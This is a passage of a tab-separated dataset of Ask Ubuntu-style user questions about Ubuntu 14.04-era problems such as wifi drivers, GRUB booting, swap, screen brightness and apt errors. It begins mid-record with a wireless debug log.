? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 10.240208 ] rtl8188ee : using firmware rtlwifi/rtl8188efw.bin [ 10.479355 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 10.479708 ] rtlwifi : wireless switch is on [ 18.747581 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 18.751540 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 20.957674 ] wlan0 : authenticate with < mac address removed > [ 20.977605 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 20.980598 ] wlan0 : authenticated [ 20.981173 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 20.984873 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 20.984992 ] wlan0 : associated [ 20.985028 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 21.034651 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=2 ) [ 21.068107 ] wlan0 : authenticate with < mac address removed > [ 21.461735 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 22.821096 ] wlan0 : send auth to < mac address removed > ( try 2/3 ) [ 22.826304 ] wlan0 : authenticated [ 22.829090 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 22.833971 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 22.834098 ] wlan0 : associated [ 54.012122 ] wlan0 : connection to ap < mac address removed > lost [ 55.405663 ] wlan0 : authenticate with < mac address removed > [ 55.425482 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 55.429380 ] wlan0 : authenticated [ 55.433055 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 55.436758 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 55.436882 ] wlan0 : associated [ 583.627809 ] wlan0 : connection to ap < mac address removed > lost [ 585.033994 ] wlan0 : authenticate with < mac address removed > [ 585.055689 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 585.156727 ] wlan0 : send auth to < mac address removed > ( try 2/3 ) [ 585.260717 ] wlan0 : send auth to < mac address removed > ( try 3/3 ) [ 585.364768 ] wlan0 : authentication with < mac address removed > timed out [ 598.385936 ] wlan0 : authenticate with < mac address removed > [ 598.405598 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 598.407041 ] wlan0 : authenticated [ 598.408993 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 598.413122 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 598.413249 ] wlan0 : associated [ 616.462662 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 617.405492 ] wlan0 : authenticate with < mac address removed > [ 617.425021 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 617.457648 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 618.310553 ] wlan0 : authenticate with < mac address removed > [ 618.329456 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 618.332790 ] wlan0 : authenticated [ 618.336698 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 618.337996 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 618.340764 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 618.340892 ] wlan0 : associated [ 618.341374 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 619.209225 ] wlan0 : authenticate with < mac address removed > [ 619.229031 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 619.230520 ] wlan0 : authenticated [ 619.236696 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 619.245231 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 619.245352 ] wlan0 : associated [ 619.257092 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=2 ) [ 619.297362 ] wlan0 : authenticate with < mac address removed > [ 619.307555 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 619.309417 ] wlan0 : authenticated [ 619.312712 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 619.316434 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x431 status=0 aid=1 ) [ 619.316561 ] wlan0 : associated # # # # # # # # # # wireless info end # # # # # # # # # # # # any sort of assistance will be greatly appreciated .
505684	vlc wo n't play dvd movies	i installed vlc player on my ubuntu 14.04 system . dvd movies wo n't play ( no sound or picture ) even though the computer tries to start the movie . what 's wrong ? is the version wrong for ubuntu 14.04 ?
505687	chkrootkit not producing a log file	this is the line from my crontab however , the log never gets sent to me..and when i check the log it is empty . i have tried chkrootkit from the terminal and it runs ok. what am i missing ? 30 09 * * * root /usr/sbin/chkrootkit & & cat /var/log/chkrootkit/log.today | mail -s `` chkrootkit log for $ ( date ) '' xxx @ gmail.com i am using 14.04 .
505689	cryptswap1 probably eating ram ; stuck in gparted ; how to fix ?	to flow into the problems i had been dealing with , my copy of lubuntu 13 became so unstable that i decided to do a fresh install of the alternative install of lubuntu 14 . had quite a bit of trouble with that , but eventually , after some hours , got it through using a terminal command to make a bootable usb . however , a particular problem that affected my prior system seems to have followed me here , and in researching/contemplating it , i think it was the problem that made my prior system so unstable . everytime i boot , i get this message that `` cryptswap1 '' is not mounted , along with a prompt to manually fix it and whatnot . i do n't think much of it , but in reading on it , i see it 's connected to ram-saps , and my constantly having to reboot prior was definitely due to constant computer freeze-ups . thus , i suspect my not getting this cryptswap1 business in order is why my computer was so malfunctional . i did search these forums and was following along in this guide : http : //askubuntu.com/a/342002/217795 but i got stuck on the gparted portion . i managed to install and run gparted , but when i request that its turn /dev/sda5 into linux-swap , it can not do so , and the source of the error is confusing . otherwise the file system is listed as `` unknown '' for the partition . i tried double-checking my terminal commands -- a funny thing about writing here is that it prompts all sorts of thoughts for what to research or solutions to try -- and i may have goofed up there . in step two , it says to `` save the file '' , but how does one do that within the terminal ? i can not find any save command , and there 's no respond to ctrl + s. also , i 'm having a tough time comprehending the way the terminal commands function , as , in being such a newb , i can presently only think in concrete-bound matters , and just copy the steps concretely , unable to apply originally . thus , when asked to input sudo nano -w /etc/crypttab , i can follow through , but when it tells me to open /etc/fstab i get confused when sudo -w /etc/fstab does n't give me the same results . so i either goofed in doing the proper modifcations in terminal , or else i 've got to get myself unstuck in gparted somehow . so what should this foolish man do to get his ram back ? oops . i forgot to include the error-info from gparted . it does n't seem to have any useful information , but in case anyone asks for it : gparted 0.18.0 -- enable-libparted-dmraid -- enable-online-resize libparted 2.3 format /dev/sda5 as linux-swap 00:00:01 ( error ) calibrate /dev/sda5 00:00:00 ( success ) path : /dev/sda5 start : 501760 end : 156301311 size : 155799552 ( 74.29 gib ) clear old file system signatures in /dev/sda5 00:00:00 ( success ) write 68.00 kib of zeros at byte offset 0 00:00:00 ( success ) write 4.00 kib of zeros at byte offset 67108864 00:00:00 ( success ) write 4.00 kib of zeros at byte offset 79769366528 00:00:00 ( success ) flush operating system cache of /dev/sda 00:00:00 ( success ) set partition type on /dev/sda5 00:00:01 ( success ) new partition type : linux-swap ( v1 ) create new linux-swap file system 00:00:00 ( error ) mkswap -l `` '' /dev/sda5 /dev/sda5 : device or resource busy
505690	nautilus actions only show if file in folder	i would like to create a couple of nautilus actions that will only show up if a certain file is in the folder . these are location actions , a simple example of one i would like is a `` make '' option that runs make in the folder , but only shows up if that folder contains a makefile . is something like this possible ? i have tried playing with basenames but they seem to only work for selected items . i have also looked into the `` execution environment '' option on the `` environment '' panel . i could probably do this by using the `` appears if the command outputs 'true ' '' option , but i ca n't figure out how to pass the folder path to that command .
505694	backlight issues with asus x551mav-eb01-b	i 've got a fresh install of trusty ( xubuntu if that matters , i do n't think it should ) on a asus x551mav-eb01-b . my function keys for brightness do n't work . here 's what i know so far : if i pass acpi_osi= or acpi_osi= ! to grub i can get the brightness and wifi keys to work ( i know this because i can see the osd for brightness change ) , but : in /sys/class/backlight i have two items : acpi_video0 - > ../../devices/pci0000:00/0000:00:02.0/backlight/acpi_video0 intel_backlight - > ../../devices/pci0000:00/0000:00:02.0/drm/card0/card0-edp-1/intel_backlight with cat i can see the brightness keys are adjusting acpi_video0/brightness and not intel_backlight/brightness . i 've also tried passng acpi_backlight=vendor to grub , and if i do that , then i end up with this : asus-nb-wmi - > ../../devices/platform/asus-nb-wmi/backlight/asus-nb-wmi/ intel_backlight - > ../../devices/pci0000:00/0000:00:02.0/drm/card0/card0-edp-1/intel_backlight acpi_backlight=vendor also stops the brightness keys from responding at all . for now , i 've set up an echo in /etc/rc.local to change the brightness a few seconds after lightdm starts ... but where do i go from here ?
505695	installing 14.04 via usb grub gnu ?	im new to linux and i have created a live usb correctly as documented on the site , and have selected the usb as the primary boot option in my bios . the laptop i am trying to install on is an asus x102b . the problem is when it boots from usb i do n't get a graphical install screen , i get grub 2.02 and i do n't know how to use grub and where to begin . please help me .
505696	bios settings not appearing	my friend installed ubuntu 14.04 lts on his samsung np 300 g5x laptop that had 4gb ram and a 700gb hdd . he encrypted the ubuntu installation and used lvm . after reboot he was taken directly to grub . he was successful in booting into ubuntu a couple of times but then on entering passphrase he started getting this reply - 'fs type not found ' . now , he is stuck with this and can not even boot from any live media for his bios settings is not appearing .
505697	my laptop ca n't play hd movies without stutter , via stream or vlc . graphic card problem ?	i am on a dell latitude d430 , intel® core™2 cpu u7600 @ 1.20ghz × 2 , 2gb ram , graphics intel® 945gm x86/mmx/sse2 and running ubuntu 14.02 32bit . whenever i play movies that are 1080p , vlc starts stuttering like crazy , the whole system basically jams , cpu consumption goes through the roof and even firefox is so slow . i stopped getting 1080p movies altogether to avoid these frozen states . with 720p movies the situation is a bit better . mostly they work fine , but every once a while vlc starts stuttering and pixelating . if i press pause and wait for a minute , the cpu seems to `` cool down '' and i can resume playing without problems . sometimes even on youtube , which is automatically set at low res , 360p , the play stutters and this is certainly not the internet which is 500mbps and also streaming is fully pre-loaded . i at first thought that this could depend on the slow cpu . i have run terminal -top to check cpu consumption and it looks high , when i play movies it goes up to 120 or 130 % consumption , but i think this is still ok , since it 's a dual core , so maximum should be 200 % , right ? i worry the problem is maybe with the integrated intel graphic card . i have found many users complaining about this running ubuntu , with my same exact model . the drivers are correctly installed and everything seems kosher , if it was n't that performance is very bad . so my question is : is this problem with ubuntu ? if i install ios luna or another distro or even ( yuck ) putting on a win7 would i be able to play movies normally ? i think the laptop specs should be enough for at least a 720p movie and i use mainly my laptop for movies as it is connected to my tv . if the problem lies with the specs insufficient to play hd movies , should i buy a graphic card or is it the cpu that it is too slow and i need to just resign myself to get a new laptop ? thank you
505701	how to bold the characters using echo	required output of echo in bold letters while using echo command i want the content to be bold and it should have same bold view while appending echo output to the file echo `` hi '' > test.txt i want hi should be in bold in the test.txt file
505703	used vmware player free , now ca n't log back into xubuntu 14.04 after rebooting	recently i installed vmware player free , in the form of the latest version , in my laptop running xubuntu 14.04 trusty . i then set up another linux os to run as a virtual machine thereon , x 'd out of it shortly thereafter , and went back to using chrome for a bit . the computer seized up at some point , and i had to reboot . once i 'd rebooted , i found that whenever i enter my login password successfully now , i just flash quickly to a black screen , and go right back to the login prompt again ... and again ... and again . it wo n't load . the message i saw for a split second each time was : `` starting vmware amqp service : failed '' , `` saned disabled ; edit /etc/default/saned '' , and `` *restoring resolver state '' . please , if there 's any other way to fix this than with a reinstall , then i will do it . my semesters notes and work and projects are all there , so i really need your help if you will . thank you .
505705	different wallpapers on different desktops	how to set different wallpapers on different desktops ( workspaces ) ? why is this option disabled , by default , in ubuntu ?
505707	start ubuntu 14.04 with terminal	i have a system with a dual-boot of windows 8.1 32-bit and ubuntu 14.04 64-bit . ubuntu usually works but after i became root with the command `` sudo su '' and rebooted my pc it had a black screen after the ubuntu logo with the dots goes off . i started ubuntu 's terminal so i can use it to start up ubuntu but it do n't know how . my graphics card is ati radeon 3100 graphics . how do i start ubuntu with terminal ?
505708	setting of grub for two linux distributions installed to two separate hard disks	i installed a second hard disk to my laptop so that i can test on new linux distribution without trashing my working one . i did the following : installed linux mint 15 to my first drive sda and use it as my working linux installed linux mint 16 to my second drive sdb and test it i used sudo update-grub when boot to sda so that i can dual boot the two distributions since linux mint 15 is no longer supported , i did my backup , cloned sdb to sda using clonzilla i want to use the sudo update-grub trick again so that i can dual boot both linux mint 16 distributions at sda and sdb . i went to step 5 , but things do n't go as expected , if i plugged sdb into my laptop , it automatically boot to sdb , no matter which distribution i choose . how should i adjust grub ? update 01 i have extracted my grub info using boot-repair and can be accessed via : http : //paste2.org/ng99v4fs
505710	how to set the resolution of the screen	help me , my resolution is not accurate and all of my programs/applications is cut into half . so i ca n't set the setting and something else ... please help me , sorry my english is terrible but please help me ... my screen is weird now
505711	vm virtualbox resolution proplem	i am running ubuntu on oracle vm virtualbox and it installed fine , but once it restarted it boxed me into the top left corner of my screen , i can not change the resolution or can find anything about it on vm settings .
505712	how do i access wifi on xubuntu 14.04 ? it has something to do with with the proprietary drivers stopping me	i 'm running xubuntu 14.04 on a dell latitude d620 , i do not know what kind of wifi card i have but i do know i have one . when i turn it on xubuntu does n't attempt to search for wireless networks , instead saying the ethernet is offline . i know it has something to do with the proprietary drivers that were previously installed due to this being a company owned computer . what can i do to make xubuntu attempt to connect or even recognize the wifi around ?
505718	cant get every icons in system settings in ubuntu14.04	i do n't know what 's wrong , i ca n't see any icons in system settings , i'am using ubuntu 14.04 , how can i get it back . there are only 5 icons in settings now .
505720	bash script using `sudo` runs correctly from cli but not when clicked to run	i am trying to get a simple bash script to run when i click on it . it runs perfectly from the cli but starting motion with sudo fails to start . i have that script setup with sudoers already for nopasswd , it starts up correctly and does not ask for password when run from cli . it also closes everything correctly when ran from cli , but it is almost like the sudo lines get skipped when i just double click on the file and tell it to run . here is my script : # ! /bin/bash check_process ( ) { [ `` $ 1 '' = `` '' ] & & return 0 [ `pgrep -n $ 1` ] & & return 1 || return 0 } check_process `` motion '' if [ $ ? -eq 0 ] then sudo /etc/init.d/motion start firefox http : //localhost:8081/ > /dev/null & else sudo /etc/init.d/motion stop killall firefox > /dev/null & fi
505722	can not get my computer sound to work - please help	i can not get the sound to work on my ubuntu computer ! i am running os version ubuntu 12.04 lts . here is the think to my alsa information . http : //www.alsa-project.org/db/ ? f=a326f05cb4efcf9d8a65535609bea26fbceb2146
505723	chromium and flash plugin problem ?	i 've already installed flash plugin using sudo apt-get install flashplugin-installer . flash plugin is working on firefox browser , but chromium still asks for me to install flush plugin .
505731	remove the skip mounting message	i once had 50gb ntfs and 200 gb ntfs partition and remaining ext4 for ubuntu . i had set them to automount in 'disks ' . few days ago i uninstalled windows and deleted the two partitions and made new 250gb ext4 partition . on startup ubuntu annoys me to skip mounting or manual recovery of the deleted partation . i ca n't do the reverse because it does n't exist in disks . what should i do ?
505732	ca n't install software via apt-get	i ca n't install any software via apt-get . the following is details err http : //archive.ubuntu.com/ubuntu/ trusty/universe iotop amd64 0.6-1 could not connect to 58.247.178.239:8081 ( 58.247.178.239 ) , connection timed out e : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/i/iotop/iotop_0.6-1_amd64.deb could not connect to 58.247.178.239:8081 ( 58.247.178.239 ) , connection timed out whatever i change soure server , it connect 58.247.178.239 . any advice ?
505735	how to set directory permission in linux which prevents users ( except owner ) to delete file but allow them to modify content ?	environment : server - ubuntu ( as of now ver 13 ) clients - windows 8 boxes we are setting up samba-nas box running ubuntu in office , there is one requirement by team to set following system . 1 . owner will place file in folder which can be deleted by owner only . 2 . other users can modify content of directory ( actually process owned by other users on windows desktop will access this files and modify its content ) . but they should be able to delete it . i explored chattr and sticky bit , but could not find combination to make it work . the drives are where files will be created/edited are on non-root drives and will be mounted on mnt/disk directory .
505737	ubuntu 14.04 hangs during shutdown . sticks on plymouth splash screen , only responds to forced shutdown	as of a few days ago ubuntu will no longer shutdown or reboot . it hangs on the plymoputh splash screen with the dots ticking along . if i press one of the f keys at the start of the shutdown the only things that stick out to me are : killing all remaining processes ... . [ fail ] repeated instances of hub 1-0:1.0 : connect-rebounce failed , port 5 disabled hub 1-0:1.0 : connect-rebounce failed , port 6 disabled which completely fill the syslog and kernlog 's . have edited grub to grub_cmdline_linux_default= '' quiet splash acpi=force '' as suggested in another bug fix . have tried sudo shutdown -h now also sudo shutdown -v -h now with no joy lsusb freezes with no output as well as lsbusb -v problem does not persist in a live usb environment . also weirdly my mouse cursor dispappears for a few minutes at each startup . it is still present but you ca n't see it . it seems to go away when the screen does a minor refresh ( nvidia settings kicking in ? ) ca n't find anything that relevant on launchpad . 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux
505740	unable to install ubuntu 14.04 alongside windows 7 in my toshiba satellite pro l510	i have burned the iso to a dvd . but while trying to install it is coming till the option of install ubuntu alongside windows . but after that it is asking me to remove the dvd from the drive and directly going to boot window . anybody can help me please ?
505744	install ubuntu 14.4.1 inside the windows 7 without make the partition on the disk	question of belani jaimin : i have already installed windows 7 32 bit on my laptop . now i want to install ubuntu 14.04 on my laptop . i have dell vostro 2520 model . but i ca n't found the option as `` install ubuntu along with windows 7 '' but i found the option as `` install ubuntu inside windows 7 '' than how can i install ubuntu without make new partition table ?
505745	trying to install app but getting errors	i 'm trying to install openpilot 14.01 on my `` precise '' i386 system but i keep getting errors like error : dependency is not satisfiable : libc6 ( > = 2.17 ) , and after trying several cl answers to try and rectify this the problem still persists ? , these have been : - `` sudo apt-get install -f '' , and : - `` sudo apt-get update '' , also tried `` wget http : //launchpadlibrarian.net/136992776/totem_3.6.3-0ubuntu6_i386.deb '' , but this gave error , `` dependency is not satisfiable : libclutter-1.0-0 ( > = 1.10.0 ) '' i tried to fix with : - `` sudo apt-get install gdebi-core '' but i still have the original error when i try the `` openpilot '' install ? any help in this matter would be gratefully recieved and i would add that i have tried to upgrade my system to a later one but found it broken far beyond my time to fix quota , so for the moment i have stuck with this install and have been very happy with the experience to date . again a major thanks to any who can help ... .cheers ! .
505747	screen brightness is always full	the screen brightness of my laptop is always full when i log in ubuntu . when i set it low and restarts its again on its maximum . i want it to remember my last choice . how to do this ?
505748	ubuntu 14.04 wired connection not detecting	dual booted windows with ubuntu a few weeks back . my internet connection seems to be automatically detected on windows , but not on ubuntu . here is the output from ifconfig : eth0 link encap : ethernet hwaddr 00:17:7c:19:32:8d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:175 errors:0 dropped:0 overruns:0 frame:0 tx packets:175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:12609 ( 12.6 kb ) tx bytes:12609 ( 12.6 kb ) revised current : output from /etc/network/interfaces file # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback output from sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 06 serial : 00:17:7c:19:32:8d size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:40 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff output from dmesg | grep -e eth0 -e r8169 [ 2.496839 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 2.496850 ] r8169 0000:02:00.0 : ca n't disable aspm ; os does n't have aspm control [ 2.497073 ] r8169 0000:02:00.0 : irq 40 for msi/msi-x [ 2.497194 ] r8169 0000:02:00.0 eth0 : rtl8168e/8111e at 0xffffc90000642000 , 00:17:7c:19:32:8d , xid 0c100000 irq 40 [ 2.497195 ] r8169 0000:02:00.0 eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 11.058347 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 15.752240 ] r8169 0000:02:00.0 eth0 : link down [ 15.752255 ] r8169 0000:02:00.0 eth0 : link down [ 15.752283 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 15.752529 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready i reinstalled ubuntu once again and now i seem to have a wired connection being detected ... however there are still no signals on the wifi symbol at the upper right hand corner ... tried all the steps discussed earlier ... is there a way out ? screenshot : http : //tinypic.com/r/2zohq0w/8
505749	error while accessing custom class in php-java-bridge on tomcat7 in ubuntu 12.04	http status 500 - type exception report message description the server encountered an internal error ( ) that prevented it from fulfilling this request . exception javax.servlet.servletexception : java.lang.runtimeexception : php fatal error : uncaught [ [ o : exception ] : '' java.lang.exception : createinstance failed : new classes.salestax . cause : java.lang.classnotfoundexception : classes.salestax vm : 1.6.0_31 @ http : //java.sun.com/ '' at : # -10 org.apache.catalina.loader.webappclassloader.loadclass ( webappclassloader.java:1701 ) # -9 org.apache.catalina.loader.webappclassloader.loadclass ( webappclassloader.java:1546 ) # -8 java.lang.class.forname0 ( native method ) # -7 java.lang.class.forname ( class.java:270 ) # -6 php.java.bridge.util.classforname ( util.java:1518 ) # -5 php.java.bridge.javabridge.createobject ( javabridge.java:445 ) # -4 php.java.bridge.request.handlerequest ( request.java:458 ) # -3 php.java.bridge.request.handlerequests ( request.java:500 ) # -2 php.java.bridge.http.contextrunner.run ( contextrunner.java:145 ) # -1 php.java.bridge.threadpool $ delegate.run ( threadpool.java:60 ) # 0 /var/lib/tomcat7/webapps/javabridge/java/java.inc ( 232 ) : java_throwexceptionproxyfactory- > getproxy ( 1 , null , 't ' , false ) # 1 /var/lib/tomcat7/webapps/javabridge/java/java.inc ( 360 ) : java_arg- > getresult in /var/lib/tomcat7/webapps/javabridge/java/java.inc on line 195 php.java.servlet.fastcgi.fastcgiservlet.handle ( fastcgiservlet.java:499 ) php.java.servlet.fastcgi.fastcgiservlet.dopost ( fastcgiservlet.java:509 ) javax.servlet.http.httpservlet.service ( httpservlet.java:641 ) javax.servlet.http.httpservlet.service ( httpservlet.java:722 ) php.java.servlet.phpcgifilter.dofilter ( phpcgifilter.java:126 ) root cause java.lang.runtimeexception : php fatal error : uncaught [ [ o : exception ] : '' java.lang.exception : createinstance failed : new classes.salestax . cause : java.lang.classnotfoundexception : classes.salestax vm : 1.6.0_31 @ http : //java.sun.com/ '' at : # -10 org.apache.catalina.loader.webappclassloader.loadclass ( webappclassloader.java:1701 ) # -9 org.apache.catalina.loader.webappclassloader.loadclass ( webappclassloader.java:1546 ) # -8 java.lang.class.forname0 ( native method ) # -7 java.lang.class.forname ( class.java:270 ) # -6 php.java.bridge.util.classforname ( util.java:1518 ) # -5 php.java.bridge.javabridge.createobject ( javabridge.java:445 ) # -4 php.java.bridge.request.handlerequest ( request.java:458 ) # -3 php.java.bridge.request.handlerequests ( request.java:500 ) # -2 php.java.bridge.http.contextrunner.run ( contextrunner.java:145 ) # -1 php.java.bridge.threadpool $ delegate.run ( threadpool.java:60 ) # 0 /var/lib/tomcat7/webapps/javabridge/java/java.inc ( 232 ) : java_throwexceptionproxyfactory- > getproxy ( 1 , null , 't ' , false ) # 1 /var/lib/tomcat7/webapps/javabridge/java/java.inc ( 360 ) : java_arg- > getresult in /var/lib/tomcat7/webapps/javabridge/java/java.inc on line 195 php.java.servlet.fastcgi.fastcgiservlet.parsebody ( fastcgiservlet.java:409 ) php.java.servlet.fastcgi.fastcgiservlet.execute ( fastcgiservlet.java:433 ) php.java.servlet.fastcgi.fastcgiservlet.handle ( fastcgiservlet.java:481 ) php.java.servlet.fastcgi.fastcgiservlet.dopost ( fastcgiservlet.java:509 ) javax.servlet.http.httpservlet.service ( httpservlet.java:641 ) javax.servlet.http.httpservlet.service ( httpservlet.java:722 ) php.java.servlet.phpcgifilter.dofilter ( phpcgifilter.java:126 ) looking for help .
505752	accidental moving of root folder unable to log in	i was using 12.04 lts as a fileserver ( using samba to access it from windows client machines ) for a large amount of documents , and used to add files to it regularly . yesterday i goofed up , i copied a folder into server , but noticed that i needed to move a directory and few files out to another directory . i moved few files , but while moving the directory , i used the command mv -t / to my serving directory . this caused instantaneous crashing of my system and when i restarted , it failed to boot completely and got stuck while finding bin/sh while trying to execute the scripts . is there a way to recover it , although i have the backup of may be 95 % documents in a external hd , i need the rest 5 % too .
505753	ubuntu 14.04 asking google permission	this question is related . so every time i boot ubuntu it keeps asking for a google account permission and i have to go to system settings and click on grant access every time . how do i fix it ?
505755	how to solve the issue `` requires installation of untrusted packages ''	this seems different from this question : requires installation of untrusted packages ? when i clicked software updater , it loaded the update list first . then , it required me to type my password . the message `` requires installation of untrusted packages '' appeared . if i click `` ok '' and try to update again , i will get the same result . how to solve it ? thank you for your attention . new this problem comes from the update of `` app grid '' since other updates go fine .
505756	i cant format sandisk cruzer edge usb : read-only filesystem	so , i have an old sandisk cruzer edge 4gb usb drive , and i know how to format the usb , so i did what works for all usb drives , first , i used fdisk -l to find my usb 's file-system . heres what came up : disk /dev/sdb : 4004 mb , 4004511744 bytes 124 heads , 62 sectors/track , 1017 cylinders , total 7821312 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000000 disk /dev/sdb does n't contain a valid partition table so , i 'm going on , i successfully unmounted the usb , then ran the command sudo mkfs.ext4 /dev/sdb i get the error : user @ user : ~ $ sudo mkfs.ext4 /dev/sdb mke2fs 1.42.9 ( 4-feb-2014 ) /dev/sdb is entire device , not just one partition ! proceed anyway ? ( y , n ) y /dev/sdb : read-only file system while setting up superblock please help ? thanks for any help ! ps : my usb does n't show up in gparted , so do n't tell me to try that please : )
505757	single processing unit and multiple users	how can build system with ubuntu using a single processing unit ( probabluly normal cpu or intel nuc with i5 ) on which 5 or more users can use it simultaniously ? so there going to be one one cpu and 5 or more moniters , keyboards and mouse , so every user front on each computer can do his own work.. i want to use it in a school in a village in india to teach basic things about computer and so wanted it to be cost effective.. if it is not possible with above sysyem , please suggest alternative ideas .
505758	how to convert flv to mp3 on ubuntu 14 without ffmpeg	and how to do any convertions in ubuntu 14 if there is no ffmpeg anymore ? when i last use it prev version i had warning to use different tool but i do n't remember what it was .
505759	the newest kernel 3.13.0-32 fails during boot - any solutions ?	the newest kernel 3.13.0-32 fails to boot and hangs saying ... resume : libgcrypt 1.5.3 ( i think ) . eventually it complains about not being able to mount swap but when i revert to kernel 3.13.0-30 everything works perfectly . please let me know if i can supply any information to help solve this . or if there are any boot settings that might help . joel parke
505763	not able to authenticate during sofware installation	when i try to install a package through software centre , an authentication window pops up . the authentication window is like this : but the window disappears immediately and i am not able to authenticate .
505766	unable to see recent chats in skype 4.3	after upgrading to latest version ( 4.3.0.37 ) the skype no longer showing recent chats . it is showing a small black box as shown in the bellow pic instead of chat list . http : //imagizer.imageshack.com/img631/3034/drpxzr.png if i downgrade the version , i am not able to login skype . how to make `` recent chats '' to show recent chat history ?
505768	how to auto wake up system at particular time ?	how can configure ubuntu 14.04lts to auto wake up ( start , may be from hibernate mode ) my computer at particular time of night ( 2am ) and dial broadband connection ( bsnl , india ) ? preferably i want to do it using terminal.. or is there any software for it ?
505770	ubuntu linux install	please am trying to install ubuntu alongside windows 8.1 but it stays on the screen without booting into the ubuntu when i choose the try ubuntu or install ubuntu . please can u help me because the last time i tried it told me i have exceeded the number of partitions . please help me .
505773	sd card reader wo n't work	i have asus x552v with built in sd card reader and ubuntu 14.04 64bit , and i tried to mount sd card , but it does n't even show up . nothing happens when i insert sd card . i tried restarting computer with sd card inserted , but still nothing . anyone had this problem before ?
505774	unable to connect to wifi in ubuntu 14.04	i 'm using acer aspire 4752 and ubuntu 14.04 , i 'm unable to connect to wifi , it keeps on asking password , but not connecting to the network .
505775	hibernating while installing ubuntu 14.04	i clicked hibernating button while installing ubuntu 14.04 . then , systems seems stopped . so i reboot my laptop forcibly ( mistake ) . my hard disk seem broken . i can launch 'ubuntu without installing ' through usb . how can i recover my windows data or other files ? testdrive is not working in 'ubuntu without installing'
505777	cant delete folders with files in it:	when i try to delete folder with some files nomater how it do n't allow me to delete it ( when i right click the folder and click delete the option is active but does nothing ) , first i have to delete all files from the folder and then i can to delete it . how to fix this problem ?
